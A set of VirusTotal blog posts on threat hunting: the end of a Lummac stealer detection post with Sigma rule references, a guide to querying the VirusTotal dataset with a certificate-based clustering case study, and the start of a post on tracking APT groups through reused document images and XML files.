      "SystemTime": "2024-12-02T00:52:23.072811600Z"
    },
    "EventRecordID": 1555690,
    "Correlation": {},
    "Execution": {
      "ProcessID": 2624,
      "ThreadID": 3112
    },
    "Channel": "Microsoft-Windows-Sysmon/Operational",
    "Computer": "DESKTOP-B0T93D6",
    "Security": {
      "UserID": "S-1-5-18"
    }
  },
  "EventData": {
    "RuleName": "-",
    "UtcTime": "2024-12-02 00:52:23.059",
    "ProcessGuid": "{C784477D-04C6-674D-5C06-000000004B00}",
    "ProcessId": 7592,
    "Image": "C:\\Users\\george\\Desktop\\ezzz.exe",
    "TargetFilename": "C:\\Users\\george\\AppData\\Roaming\\MyData\\DataLogs.conf",
    "CreationUtcTime": "2024-12-02 00:52:23.059",
    "User": "DESKTOP-B0T93D6\\george"
  }

Wrapping up

Detection engineering teams can proactively create new detections by hunting for samples that are being distributed and uploaded to our platform. Applying our approach can benefit in the development of detection on the latest behaviors that do not currently have developed detection mechanisms. This could potentially help organizations be proactive in creating detections based on threat hunting missions.

The Sigma rules created to detect Lummac activity have been used during threat hunting missions to identify new samples of this family in VirusTotal. Another use is translating them into the language of the SIEM or EDR available in the infrastructure, as they could help identify potential behaviors related to Lummac samples observed in late 2024. After passing quality controls and being published on Sigma's public GitHub, they have been integrated for use in VirusTotal, delivering the expected results. You can use them in the following way:

Lummac Stealer Activity - Execution Of More.com And Vbc.exe

sigma_rule:a1021d4086a92fd3782417a54fa5c5141d1e75c8afc9e73dc6e71ef9e1ae2e9c

File Creation Related To RAT Clients

sigma_rule:8f179585d5c1249ab1ef8cec45a16d112a53f91d143aa2b0b6713602b1d19252

We hope you found this blog interesting and useful, and as always we are happy to hear your feedback.

VirusTotal Blog
Exploring the VirusTotal Dataset | An Analyst's Guide to Effective Threat Research 29 August 2024 at 10:56

Exploring the VirusTotal Dataset | An Analyst's Guide to Effective Threat Research

VirusTotal Blog

By: Joseliyo Sánchez

29 August 2024 at 10:56

By Aleksandar Milenkoski (SentinelOne) and Jose Luis Sánchez Martínez

VirusTotal stores a vast collection of files, URLs, domains, and IPs submitted by users worldwide. It features a variety of functionalities and integrates third-party detection engines and tools to analyze the maliciousness of submitted artifacts and gather relevant related information, such as file properties, domain registrars, and execution behaviors.

The VirusTotal dataset, the backbone of the platform, structures artifact-related information into objects and represents relevant relationships between them, providing contextual links between various artifacts. This makes VirusTotal a valuable resource for threat research, enabling users to perform activities such as clustering artifacts related to specific threat actors or campaigns, tracking malicious activities, and analyzing trends in the threat landscape.

In this post, part of a collaborative effort between VirusTotal and SentinelLabs, we explore how to effectively use VirusTotal’s wide range of querying capabilities, highlight scenarios in which these capabilities return informative results, and discuss factors that may impact the completeness or relevance of the data.

The content is aimed at VirusTotal users seeking to better understand the fundamental inner workings of the platform and how to effectively use it as part of their investigations. This contribution complements the comprehensive VirusTotal documentation by discussing certain aspects in greater detail along with a summary of relevant context and usage information, and demonstrating how VirusTotal capabilities are applied in real-world cases.

Overview

The VirusTotal platform analyzes files and network-related artifacts (URLs, domains, and IPs) submitted to the platform to detect maliciousness. The platform aggregates results from third-party detection engines, web scanners, and other tools to provide thorough analysis overviews.

VirusTotal stores submitted artifacts as well as information related to each artifact in a dataset, which we refer to as the VirusTotal dataset. The artifact-related information is extensive and diverse, including, for example, file properties such as filename, file type, digital signatures, and hashes, as well as URL components such as domains, URL paths, and URL query parameters.

VirusTotal provides interfaces for users to interact with the platform and search filters for querying it. The search filters allow for retrieving and pivoting through artifact-related information. Additionally, they enable clustering multiple artifacts and identifying newly submitted ones based on user-defined queries aimed at capturing overlaps in content or related information. This has many use cases in threat intelligence, such as identifying trends in the threat landscape, commonalities between different threats, and tracking specific threat groups or campaigns.

Below, we first provide an overview of the VirusTotal dataset structure and the different interfaces available for interacting with it, with a focus on querying the dataset using search filters. We then delve into search modifiers, a specific type of VirusTotal search filter, highlighting modifiers for querying data generated by artificial intelligence (AI) technology. Next, we discuss factors that may impact the relevance or completeness of results when querying using search modifiers, including an example of using search modifiers in an actual threat research investigation.

The VirusTotal Dataset

The VirusTotal dataset is the backbone of the VirusTotal platform. Current records indicate that it stores a vast amount of submitted artifacts and related information, including over 50 billion files, 6 billion URLs, and 4 billion domains. The data is stored in a structured and hierarchical manner.

The top-level structure of the VirusTotal dataset

Artifact-related information is structured into objects, which have an ID, a type, and attributes. Optionally, objects may also have one or multiple relationships.

VirusTotal objects

The object ID uniquely identifies an object. An object can be directly related to a submitted artifact: a file, URL, domain, or IP address. In this case, the object's ID is derived from the artifact itself — the SHA-256 hash for files, the IP address or domain itself for IPs or domains, and the SHA-256 hash or the Base-64 encoded form for URLs.

An object type indicates the type of information stored by an object. For example, an object of type file stores file-specific information about submitted files, such as filenames, file hashes, and the file extension, whereas an object of type domain stores domain-specific information about submitted domains, such as the domain’s registrar. The objects of type file, url, ip, or domain are directly related to submitted artifacts, while the rest, such as threat_actor or reference, are not.

An attribute is a data item that stores information related to an object and can be of a primitive or a complex data type, such as an array or a structure. For example, the file object (an object of type file) includes the string attribute sha256. This attribute stores the SHA-256 hash of a submitted file. Additionally, it may contain the attribute lnk_info, specifically present for Windows Shortcut (LNK) files. lnk_info is a structure containing information specific to LNK files and extracted from the submitted file, such as the date at which the shortcut had been created.

Relationships signify connections between objects of the same or different types, making them particularly useful for describing scenarios involving multiple artifacts. For instance, the malicious file config.lnk file (SHA-256 hash 85b317bb4463a93ecc4d25af872401984d61e9ddcee4c275ea1f1d9875b5fa61) communicates with the IP address 149.51.230[.]198 to download a payload.

In the context of VirusTotal, this relationship is represented through the communicating_files relationship of the ip_address object, which is directly related to 149.51.230[.]198. communicating_files stores information about all files, in the form of file objects, observed to communicate with the IP address during sandbox execution. VirusTotal executes submitted executable files in sandboxes to capture behaviors and artifacts visible only while the file is executing, such as started processes, network communications, changes to the file system, or strings present in process memory.

The communicating_files relationship

Top-level collections group all objects of the same type. The top-level collections that VirusTotal currently implements are files (a set of all objects of type file), urls (a set of all objects of type url), ips (a set of all objects of type ip), domains (a set of all objects of type domain), collections (a set of all objects of type collection), threat actors (a set of all objects of type threat_actor), and references (a set of all objects of type reference).

The object of type collection is not to be confused with top-level collections. This object groups multiple objects of the same or different types given a user-specified context, such as a threat actor, a malicious campaign, or a malware family.

The top-level collections enable operations that relate to the set of all objects of a given type. Such an operation is submitting a new file for analysis, which adds an object of type file to the files collection.

Querying VirusTotal

VirusTotal exposes two interfaces for interacting with its dataset: the platform’s graphical user interface (GUI) for manual interaction and the application program interface (API) for programmatic interaction.

The VirusTotal GUI

The VirusTotal GUI is the web interface of the platform. To query VirusTotal using the GUI, users enter a search query into the search field. A search query is composed of one or multiple search filters.

A search filter can be a value uniquely identifying a submitted artifact – a URL, domain, file hash (MD5, SHA-1, or SHA-256), or an IP address. This filter cannot be combined with other filters and is used for retrieving information related to only a single submitted artifact.

When a user inputs a value, VirusTotal retrieves the corresponding artifact and related information from its dataset and displays this data to the user as a web analysis report. To retrieve the artifact and its related information, VirusTotal searches its dataset for an object that has an ID or an attribute (for MD5 or SHA-1 hashes) that matches the user-provided value. The platform also explores relationships to and from this object.

Web analysis report (search query: 85b317bb4463a93ecc4d25af872401984d61e9ddcee4c275ea1f1d9875b5fa61)

Querying using value uniquely identifying a submitted artifact

A search filter can also be a search modifier in the format modifier:value, where value may be a predefined or a user-specified search criterion.

Each modifier is mapped to one or more of the top-level collections files, urls, ips, domains, and collections, forming sets of file-, URL-, IP-, domain-, and collection-specific search modifiers. Further information on these modifiers can be found in the official VirusTotal documentation.

Multiple modifiers can be combined into more complex search queries using the logical operators AND, OR, and NOT. Parentheses can be used to group modifiers and logical operators, allowing for more precise queries by controlling the order of operations. All modifiers within a search query must be mapped to a single top-level collection.

A special modifier is entity, which defines the top-level collection to which the search query is applied. For example, entity:file applies the search query to the files collection, and entity:url applies the query to the urls collection. If a user does not explicitly specify the entity modifier, the platform defaults to entity:file.

Structured overview of commonly used file-specific search modifiers (entity:file)

For each modifier, VirusTotal searches for and retrieves objects within the collection that the modifier is mapped to. These objects have an ID or attribute, or a relationship to another object with an ID or attribute, that meets the search criterion. For example, entity:domain AND domain:test instructs VirusTotal to retrieve all objects of type domain whose IDs (the domains themselves) contain the string test. An exception is the content modifier, which instructs the platform to search through the content of submitted files.

In the case of a complex search query combining multiple modifiers using AND, OR, and/or NOT, VirusTotal combines the retrieved objects for each modifier into a resulting set that meets the combined criteria.

The platform then displays an overview of the resulting set of objects to the user in the form of a list of web analysis results. When a user clicks on an item in the list, the platform generates a web analysis report based on the corresponding object’s ID, as described previously.

List of web analysis results (search query: entity:domain AND domain:test)

Querying using search modifiers

In addition to scoping searches to a specific top-level collection, VirusTotal also uses the entity modifier to disambiguate between search modifiers mapped to more than one collection, such as fs (first submission date). For example, entity:file AND fs:2024-07-15 instructs VirusTotal to search the files collection for file objects where the first_submission_date attribute is set to July 15, 2024. In contrast, entity:url AND fs:2024-07-15 directs VirusTotal to search the urls collection for url objects where first_submission_date is set to the same date.

The VirusTotal API

A basic way to query VirusTotal using the API is to issue HTTP GET requests to API endpoints exposed by the platform and specify search filters as part of the request URLs. VirusTotal implements multiple endpoints, such as the following:

/api/v3/intelligence/search?query={query}: This endpoint allows querying VirusTotal in the same manner as the GUI, using a value that uniquely identifies a submitted artifact (a URL, domain, IP address, or file hash) or search modifiers. Example request URLs are https://www.virustotal.com/api/v3/intelligence/search?query=test.com and https://www.virustotal.com/api/v3/intelligence/search?query=entity:domain+and+domain:test.
/api/v3/files/{hash}: This endpoint retrieves the file object whose md5, sha1, or sha256 attribute matches the user-provided value. An example request URL is https://www.virustotal.com/api/v3/files/e6adf40a959308ea9de69699c58d2f25.

Querying using the /api/v3/files/{hash} API endpoint

VirusTotal returns JSON-formatted data in response to API requests. Users can parse this data and use it for additional actions, such as further querying and pivoting through the VirusTotal dataset.

Web requests can be issued using various methods, such as HTTP client libraries, command-line tools, or custom scripts. vt-py, the official Python library for the VirusTotal API, simplifies the process of sending web requests to endpoints and handling the responses, enabling users to perform various tasks programmatically.

The API vs. The GUI

There are several key differences between the VirusTotal GUI and API, particularly regarding scalability and the scope of available information.

The programmatic use of the API enables users to conduct large-scale querying of VirusTotal, which is not achievable through manual use of the GUI. For example, retrieving the names of the processes started by all Windows Shortcut files submitted to VirusTotal over 2024 is a task that is practically feasible only using the API.

Further, not all data stored in the VirusTotal dataset can be used as part of search queries using the GUI, which limits its querying capacity. For example, there are no search modifiers allowing users to query for URLs constructed in process memory during sandbox execution that submitted files have not contacted, such as secondary C2 URLs, which are contacted if communication with the primary C2 server fails. Although such search modifiers can be useful during investigations, the VirusTotal GUI displays these URLs in the Memory pattern URLs section of web analysis reports without providing a method to query for them directly.

The API endpoint /api/v3/files/{hash}/behaviours retrieves sandbox-generated data for files specified by their hash value. URLs discovered in process memory are stored in the memory_pattern_urls field returned by the endpoint. For files that meet other search criteria, users can programmatically extract the URLs and keep the file in consideration if a URL aligns with a specific search requirement.

memory_pattern_urls values

The API may provide more information than what is visible to users in the GUI. For example, there can be discrepancies in sandbox-generated data provided to users through the GUI and the API. For example, the /api/v3/files/{hash}/behaviours endpoint retrieves all data generated by the sandbox CAPE for the file with the user-specified hash, including details on the suspicious behavior rules triggered by the file during execution. This information is not provided to users in the GUI.

CAPE suspicious behavior rules retrieved by api/v3/files/{hash}/behaviours

AI Search Modifiers

VirusTotal leverages artificial intelligence (AI) to generate natural language summaries of the functionalities of code in executable files submitted to the platform, such as scripts, Microsoft Office documents, or binary files. This feature is particularly beneficial for malware analysis, assisting analysts in understanding the capabilities of malware under investigation.

VirusTotal integrates AI engines into its pipeline for analyzing submitted files. These engines use large language models (LLMs) trained on programming languages, which enable them to analyze and translate code into natural language summaries of its functionalities. Some AI engines also generate verdicts, which are labels categorizing analyzed code as benign, suspicious, or malicious. VirusTotal supports two types of engines: Code Insight and Crowdsourced AI.

Code Insight is VirusTotal's in-house AI engine implementation, based on Google’s Gemini. Crowdsourced AI is a collection of third-party AI engines contributed by the community and is continuously enriched with new additions.

Depending on their training and design, the AI engines specialize in analyzing specific file types. For example, the ByteDefend AI engine is designed to analyze macro code in Microsoft Office files, including Word, Excel, and PowerPoint documents.

The Code Insight engine focuses on script files, such as PowerShell, Python, and Ruby scripts. It excludes from analysis any script files that exceed a set file size or similarity threshold (these values are currently undocumented). The VirusTotal platform compares each script's code with scripts previously analyzed by the AI engine and calculates a similarity value. This value is then evaluated against the similarity threshold.

While we were writing this post, Google announced that Code Insight will also support Windows Portable Executable (PE) binary files. This feature is enabled by three interconnected phases:

Unpacking binaries using the malware analysis service Mandiant Backscatter: This step reveals the underlying code of potentially obfuscated (packed) malicious binaries submitted to VirusTotal, which is the intended subject of analysis.
Decompilation of the unpacked binaries using Hex-Rays IDA Pro decompilers: This step translates the assembly code of the unpacked binaries into decompiled code written in a higher-level programming language (pseudocode). Gemini analyzes decompiled code with greater efficiency compared to assembly code due to its conciseness.
Analysis of the decompiled code with Gemini: This step generates a natural language summary of the decompiled code’s functionalities.

The Code Insight analysis workflow

The summaries generated by Code Insight and Crowdsourced AI engines for a given file are stored in the analysis fields of the crowdsourced_ai_results attribute of the corresponding object of type file. The optional verdict fields of this attribute store the verdicts, while the source fields indicate the AI engines that have analyzed the code within the file.

The crowdsourced_ai_results attribute

Users can query VirusTotal for specific verdicts or content in AI-generated summaries using search modifiers designed for that purpose. These modifiers are mapped to the files top-level collection.

For each AI search modifier, VirusTotal searches the platform’s dataset for file objects whose analysis and/or verdict fields of the crowdsourced_ai_results attribute meet the user-specified criterion. In addition, based on the source field, each AI search modifier focuses the search on summaries or verdicts generated by either Code Insight, specific Crowdsourced AI engines, or all available AI engines.

Search modifier	Usage and search scope
codeinsight	codeinsight:[text] Searches for text in summaries generated by Code Insight.
crowdsourced_ai_analysis	crowdsourced_ai_analysis:[text] Searches for text in summaries generated by Code Insight and all Crowdsourced AI engines.
crowdsourced_ai_verdict	crowdsourced_ai_verdict:[benign\|suspicious\|malicious] Searches for benign, suspicious or malicious verdicts generated by Code Insight and all Crowdsourced AI engines.
[ENGINE]_ai_analysis	[ENGINE]_ai_analysis:[content] Searches for text in summaries generated by a single Crowdsourced AI engine. [ENGINE] is the identifier for a specific engine, such as hispasec (hispasec_ai_analysis).
[ENGINE]_ai_verdict	[ENGINE]_ai_verdict:[benign\|suspicious\|malicious] Searches for benign, suspicious or malicious verdicts generated by a single Crowdsourced AI engine.

VirusTotal introduces new engine-specific search modifiers ([ENGINE]_ai_analysis and [ENGINE]_ai_verdict) as new engines are incorporated into Crowdsourced AI. For example, with the addition of the ByteDefend engine, the platform released two new search modifiers: bytedefend_ai_analysis and bytedefend_ai_verdict.

The AI search modifiers can be combined with other AI search modifiers or with any other modifiers supported by VirusTotal using the logical operators AND, OR, and NOT. For example, the search query crowdsourced_ai_analysis:"inject" AND crowdsourced_ai_analysis:"explorer.exe" can be used to identify files that perform injection involving the explorer.exe process. The results returned from VirusTotal include the PowerShell script da.ps1, which injects code from an external file into this process. This functionality of the script is documented in the summary generated by the Code Insight AI engine.

da.ps1 injects code into explorer.exe

Code Insight analysis of da.ps1

Another example is the search query crowdsourced_ai_analysis:"Shell.Run" AND behavior_created_processes:"powershell.exe". This query can be used to identify files that invoke the Run function of the Windows Script Host Shell object to execute the PowerShell process powershell.exe for conducting further activities. The results returned from VirusTotal include the Visual Basic script 297641663, which executes a PowerShell command using the Run function to download a payload from a remote server.

297641663 executes powershell.exe

Code Insight analysis of 297641663

Although the AI engines integrated into VirusTotal provide valuable insights, they should be used as tools to assist in malware analysis efforts, as part of a broader analysis strategy. AI engines are designed and trained to analyze code based on historical data, and therefore may not always accurately interpret novel techniques or highly obfuscated code in malware implementations. As a result, the summaries they generate may sometimes lack sufficient or useful information for analysts.

Clustering With Search Modifiers

The extensive number of VirusTotal search modifiers enables analysts to query the platform in a practical and precise way. This allows for retrieving submitted artifacts and related information that are relevant to specific threats under investigation. However, false positives (where retrieved data is not related to the investigated threat) and false negatives (where relevant data is missing) can impact the relevance and completeness of search results.

The way in which queries are formulated is important for addressing or alleviating the impact of these challenges. Combining search modifiers using the logical operators AND, OR, and NOT and refining search queries helps reduce the likelihood of false positives and false negatives. This is an iterative process where analysts may integrate information obtained from multiple sources into their query formulations.

For example, malware analysis may provide characteristics suspected to be unique to the investigated activity cluster, such as specific file names, hashes, registry keys, network indicators, code signatures, strings or functions used by the malware, or distinct patterns of behavior. Additionally, information from previous reports documenting activities potentially related to the current investigation can also be beneficial. Upon reviewing the accuracy and completeness of query results, analysts may adjust the queries to further improve their relevance and precision. To illustrate these concepts, we provide an example from an actual threat research investigation.

Clustering Scenario

In 2023, SentinelLabs conducted an investigation into suspected China-nexus actors targeting Southeast Asian gambling companies. The investigation led to the AdventureQuest.exe Windows PE executable, which had been submitted to VirusTotal on May 11, 2023. Analysis of the file revealed it to be a malware loader implemented using the .NET framework, deploying further executables on compromised systems. These executables download archive files from attacker-controlled servers. The archives contain sideloading capabilities, including malicious DLLs sideloaded by legitimate executables to deploy the Cobalt Strike backdoor.

AdventureQuest.exe is signed with a certificate issued to the Ivacy VPN vendor PMG PTE LTD (certificate serial number: 0E3E037C57A5447295669A3DB1A28B8A). It is probable that the PMG PTE LTD signing key has been stolen, a tactic often used by suspected Chinese threat actors to sign their malware. Based on overlaps in code and functionalities with malware observed in Operation ChattyGoblin, AdventureQuest.exe is likely part of the same activity cluster.

The certificate’s serial number provides a starting point for identifying any other malware loaders submitted to VirusTotal that are signed with the same certificate and share implementation characteristics with AdventureQuest.exe, suggesting a potential link to the same threat actor or campaign.

VirusTotal uses the Sigcheck tool to extract digital signature information from submitted Windows PE files, including the serial numbers of code signing certificates. After extraction, this information is stored in the signature_info attribute of the corresponding file objects. Users can query VirusTotal for specific signature information using the signature search modifier.

The signature_info attribute (in the file object for AdventureQuest.exe)

The signature_info attribute (in the web analysis report for AdventureQuest.exe)

The query signature: "0E3E037C57A5447295669A3DB1A28B8A" searches for submitted files that have the serial number 0E3E037C57A5447295669A3DB1A28B8A in their signature information. The query returns 94 results, including both Windows PE executables like AdventureQuest.exe and other file types, such as Windows DLLs.

VirusTotal attempts to determine the type of each submitted file using third-party tools that search for magic numbers (byte sequences) and other types of signatures that identify specific file types, such as 0x4D 0x5A for Windows PE executables. These tools include the Unix utility file, Detect-it-Easy, and AI engines. The platform then inserts keywords indicating the file type in the type_tags attribute of the corresponding file object. Users can query VirusTotal for specific keywords stored in type_tags using the type search modifier.

The type_tags attribute (in the file object for AdventureQuest.exe)

The type_tags attribute (in the web analysis report for AdventureQuest.exe)

Building on the previous search, the query signature: "0E3E037C57A5447295669A3DB1A28B8A" AND type:"peexe" narrows the results to submitted Windows PE executables. The query returns 31 results, some of which, like AdventureQuest.exe, are implemented using the .NET framework, while others are not.

The file and Detect-it-Easy tools may provide VirusTotal with information about the environments in which submitted executables are built. The platform stores the output from these tools in the magic and detectiteasy attributes of the corresponding file objects. Users can query VirusTotal for specific content in these attributes using the magic and detectiteasy search modifiers.

The magic attribute (in the file object for AdventureQuest.exe)

The magic attribute (in the web analysis report for AdventureQuest.exe)

The detectiteasy attribute (in the file object for AdventureQuest.exe)

The detectiteasy attribute (in the web analysis report for AdventureQuest.exe)

Building on the previous search, the query signature: "0E3E037C57A5447295669A3DB1A28B8A" AND type:"peexe" AND magic:".NET" further narrows the results to submitted executables built using the .NET framework. The query returns 13 results.

Closer examination of the resulting files shows that most have PDB paths, such as Ivacy.pdb. However, AdventureQuest.exe does not have a PDB path, which is typical for malware, as malware authors often strip executables of debug information. This suggests that the files with PDB paths may not be associated with the investigated activity.

VirusTotal extracts information from the header of each submitted Windows PE executable and stores this information in the pe_info attribute of the corresponding file object. Users can query VirusTotal for specific content in this attribute using the metadata search modifier.

The pe_info attribute (in the file object for AdventureQuest.exe

Further, the resulting files with PDB paths had been residing at file paths in the Ivacy VPN installation directory, such as C:\Program Files (x86)\Ivacy\IvacyService.exe. For each submitted file, VirusTotal records the names under which the file has been submitted, which may be full file paths rather than just filenames. The platform stores this information in the names attribute of the corresponding file object. Users can query VirusTotal for specific content in this attribute using the name search modifier.

The names attribute (in the file object for AdventureQuest.exe)

The names attribute (in the web analysis report for AdventureQuest.exe)

Based on our insights and previous research on Operation ChattyGoblin, we know that the threat actors do not disguise their malware as Ivacy VPN components. This suggests that the files that had been located in the Ivacy VPN installation directory before submission to VirusTotal may be false positives. An analysis of some of these files using a .NET decompiler revealed that they are indeed legitimate Ivacy VPN components.

Building on the previous search, the query signature:"0E3E037C57A5447295669A3DB1A28B8A" AND tag:"peexe" AND magic:".NET" AND (NOT metadata:".pdb") AND (NOT name:"Program Files (x86)\ivacy") further narrows the results to submitted executables that do not have PDB paths and had not been located in the Ivacy VPN installation directory before submission. The query returns one result, AdventureQuest.exe.

This suggests that VirusTotal does not host other malware loaders, which are signed with the same certificate as AdventureQuest.exe and are likely linked to the investigated threat cluster. However, the extensive number of VirusTotal search modifiers allows for the identification of such loaders based on characteristics beyond the used code signing certificate. For example, querying VirusTotal for a code segment specific to AdventureQuest.exe using the content modifier leads to further malware that is likely part of the same activity cluster. We leave this as an exercise for the reader.

Search queries and results

Clustering With Search Modifiers | Limitations

Certain aspects of how VirusTotal collects information on submitted artifacts, which users can query using search modifiers, may increase the likelihood of missing relevant findings in some search scenarios. This is particularly relevant given the third-party tools and functionalities that VirusTotal uses for collecting this information, such as sandboxes and detection engines. Each of these tools has specific limitations, which affect the quality and quantity of information VirusTotal collects and stores in its dataset. In this section, we highlight some of these limitations to help users understand how they impact querying VirusTotal with search modifiers.

As mentioned earlier, VirusTotal executes submitted executable files (executables and scripts) in sandboxes to capture behaviors and artifacts visible only during execution. Additionally, most of the sandboxes VirusTotal integrates can identify MITRE ATT&CK techniques exhibited during execution. This is accomplished through a set of rules that map observed behaviors to MITRE ATT&CK techniques.

For each submitted file, the sandboxes generate a report documenting captured activities, which are accessible to VirusTotal users. To facilitate systematic searching of sandbox-generated data, VirusTotal stores this data in an object of type file_behaviour. This object has a relationship to the file object that is directly related to the submitted file. Users can query sandbox-generated data using a variety of search modifiers, such as behavior_created_processes (searches for a name of a created process), behavior_files (searches for a name or path of an opened, written, deleted, or dropped file), or attack_technique (searches for a MITRE ATT&CK technique ID).

Sandbox-generated data in a file_behaviour object

VirusTotal’s sandboxes may not always capture relevant behaviors of executable files, for example, due to execution conditions that must be met or techniques intentionally implemented by malware authors to evade sandbox analysis. This includes command-line parameters, library or platform dependencies, or external configuration or data files. In contrast to private submissions, VirusTotal automatically executes the vast volume of executable files continuously submitted to the platform's public corpus in sandboxes, without customizing their execution or execution environments. As a result, search queries with modifiers applied to sandbox-generated data, like behavior_files or attack_technique, may return incomplete results.

For example, the BlackCat ransomware requires operators to provide an execution password as a command-line parameter (referred to as an 'access token') for the malware to initiate encryption. For the BlackCat sample veros3.exe, the CAPE sandbox has not captured any file system activities, such as deleting, creating, or modifying files. When the correct access token is provided, this sample enumerates the files and folders on the filesystem of a compromised system and encrypts files as specified in embedded configuration data.

The CAPE sandbox report for veros3.exe

In addition to running executable files in sandboxes to capture their behaviors, VirusTotal is capable of extracting malware configurations from these files. To achieve this, the platform uses the Mandiant Backscatter malware analysis service, which implements configuration extraction modules to automatically extract configurations based on known implementation patterns. Users can search through extracted configuration data using the malware_config search modifier. However, the automated extraction might not work when the analyzed malware uses new or changed methods for storing its configuration data, which are not covered by the existing modules. As a result, search queries involving malware_config may return incomplete results.

It is also important to note that some information related to submitted artifacts may change over time. For example, the last_analysis_stats attribute of the file object stores the number of third-party detection engines that have labeled the corresponding submitted file as malicious. Users can use the positives search modifier to narrow searches based on whether this number is less than, greater than, or equal to a user-specified value. For example, positives:20+ narrows searches to files that have been labeled as malicious by more than 20 engines.

last_analysis_stats attribute

Setting positives to a relatively high number is a way to focus searches on files that are likely to be malicious. However, the returned results may not include malicious files for which an insufficient number of third-party detection engines have developed detections. The development of detections is fully in control of the engines' vendors and may depend on a variety of factors.

A common factor prompting vendors to develop a detection for a specific malware implementation is the public release of a threat research report listing files that implement the malware. For example, on September 21, 2023, SentinelLabs released a report on the Sandman APT group, identifying the UpdateCheck.dll file as malware used by this group. Prior to this date, on March 15, 22, and 29, 2023, the number of engines detecting the file as malware was 5, 6, and 7, respectively. Shortly after the release of the report, this number spiked to 17 and reached 53 by September 29, 2023.

Number of engines detecting the UpdateCheck.dll malware

Conclusions

Effectively using VirusTotal for threat research requires a good understanding of the platform’s wide range of querying capabilities, the scenarios in which these capabilities return informative results beneficial to investigations, and the factors that may impact the completeness or relevance of the data returned.

While the GUI provides an agile and user-friendly way to query VirusTotal, the API enables large-scale querying, offers expanded querying capabilities, and allows for retrieving more extensive information. Additionally, the AI engines that VirusTotal integrates can significantly speed up malware analysis efforts; however, their outputs should be considered as part of a broader analysis strategy as they may lack sufficient or useful information due to limitations in design or training data. Moreover, the extensive set of search modifiers provides flexible search capabilities, but the relevance and completeness of results can be impacted by false positives and false negatives.

SentinelLabs and VirusTotal are committed to sharing information and insights that help new users gain a solid understanding of the platform’s capabilities, enabling them to make full use of the available VirusTotal features and conduct thorough investigations.

VirusTotal Blog
Tracking Threat Actors Using Images and Artifacts 29 May 2024 at 10:00

Tracking Threat Actors Using Images and Artifacts

VirusTotal Blog

By: Joseliyo Sánchez

29 May 2024 at 10:00

When tracking adversaries, we commonly focus on the malware they employ in the final stages of the kill chain and infrastructure, often overlooking samples used in the initial ones.

In this post, we will explore some ideas to track adversary activity leveraging images and artifacts mostly used during delivery. We presented this approach at the FIRST CTI in Berlin and at Botconf in Nice.

Hunting early

In threat hunting and detection engineering activities, analysts typically focus heavily on the latter stages of the kill chain – from execution to actions on objectives (Figure 1). This is mainly because there is more information available about adversaries in these phases, and it's easier to search for clues using endpoint detection and response (EDR), security information and event management (SIEM), and other solutions.

Figure 1: Stages of the kill chain categorized by their emphasis on threat hunting and detection engineering.

We have been exploring ideas to improve our hunting focused on samples built in the weaponization phase and distributed in the delivery phase, focused on the detection of suspicious Microsoft Office documents (Word, Excel, and PowerPoint), PDF files, and emails.

In threat intelligence platforms and cybersecurity in general, green and red colors are commonly used to quickly indicate results and identify whether or not something is malicious. This is because they are perceived as representing good or bad, respectively.

Multiple studies in psychology have demonstrated how colors can influence our decision-making process. VirusTotal, through the third-party engines integrated into it, shows users when something is detected and therefore deemed "malicious," and when something is not detected and considered "benign."

For example, the sample in Figure 2 belongs to a Microsoft Word document distributed by the SideWinder group during the year 2024.

Figure 2: Document used by the SideWinder APT group

The sample in question was identified at the time of writing this post by 31 antivirus engines, leaving no doubt that it is indeed a real malware sample. In the process of pivoting to identify new samples or related infrastructure, starting with Figure 2, the analyst will likely click on the URL detected by 11 out of the 91 engines, and the domains detected by 17 and 15 engines, respectively, to see if there are other samples communicating with them. The remaining two domains (related to windows.com and live.com) in this case are easily identified as legitimate domains that were likely contacted by the sandbox during its execution.

Figure 3: Relationships within the SideWinder APT group document

In the same sample, if you go down in the VirusTotal report (Figure 3), the analyst will likely click on the ZIP file listed as "compressed parent" to check if there are other samples within this ZIP besides the current one. They may also click on the XML file detected by 8 engines, and the LNK file detected by 4 engines. The remaining files in the bundled files section probably won't be clicked, as the green color indicates they are not malicious, and also because they have less enticing formats — mainly XML and JPEG. But what if we explore them?

XML files generated by Microsoft Office

When you create a new Microsoft Office file, it automatically generates a series of embedded XML files containing information about the document. Additionally, if you use images in the document, they are also embedded within it. Microsoft Office files are compressed files (similar to ZIP files). In VirusTotal, when a Microsoft Word file is uploaded, you can see all these embedded files in the embedded files section.

We have mainly focused on three types of embedded files within Office documents:

Images:Many threat actors use images related to the organizations or entities they intend to impersonate. They do this to make documents appear legitimate and gain the trust of their victims.
[Content_Types].xml:This file specifies the content types and relationships within the Office Open XML (OOXML) document. It essentially defines the types of content and how they are organized within the file structure.
Styles.xml:Stores stylistic definitions for your document. These styles provide consistent formatting instructions for fonts, paragraph spacing, colors, numbering, lists, and much more.

Our hypothesis is: If malicious Microsoft Word documents are copied and pasted during the weaponization building process, with only the content being modified, the hashes of the [Content_Types].xml and styles.xml files will likely remain the same.

Office documents

To check our hypothesis, we selected a set of samples used during delivery and belonging the threat actors listed in Figure 4:

Figure 4: Number of samples per actor within the scope

Let’s analyze some of the results we obtained per actor.

APT28 – Images

We started by focusing on images APT28 has reused for different delivery samples (Figure 5).

Figure 5: Images shared in multiple documents by APT28

Each line in the Figure 5 graph represents the same image, and each point represents at least two samples that used that particular image.

The second image of the graph shows how it was used by different Office documents at different points in time, from 2018 to 2022 (dates related to their upload to VirusTotal).

Now, the chart in Figure 6 visualizes each of these images.

Figure 6: Content of the images shared in multiple documents by APT28

The first image is just a simple line with no particular meaning. It's embedded in over 100 files known by VirusTotal.
The second image is a hand and has 14 compressed parents.
The third image consists of black circles and also has over 100 compressed parents.
The last image is like a Word page with a table, presenting a fake EDA Roadmap of the European Commission. The image format is EMF (an old format) and it has 4 compressed parents

If we delve into the compressed parents of the second image (the one with the hand), we can see how the image is used in Office documents that are part of a campaign reported by Mandiant attributed to APT28. The image of the hand was used in fake Word documents for hotel reservations, particularly in a small section where the client was supposed to sign.

Figure 7: Pivoting through a specific image used by APT28

SideWinder – Images

SideWinder (aka RAZER TIGER) is a group focused on carrying out operations against military targets in Pakistan. This group traditionally reused images, which might help monitoring their activity.

Figure 8: Images shared in multiple documents by RAZOR TIGER

In particular, the image in Figure 9 was used in a sample uploaded in September 2021 and in a second one uploaded March 2022. The image in question is the signature of Baber Bilal Haider.

Figure 9: Two different samples of RAZOR TIGER share the same image of a handwritten signature

Gamaredon – [Content_Types].xml and styles.xml

For Gamaredon we found they reused styles.xml and [Content_Types].xml in different documents, which helped reveal new samples.

Figure 10 chart displays all the [Content_Types].xml files from Gamaredon's Office documents.

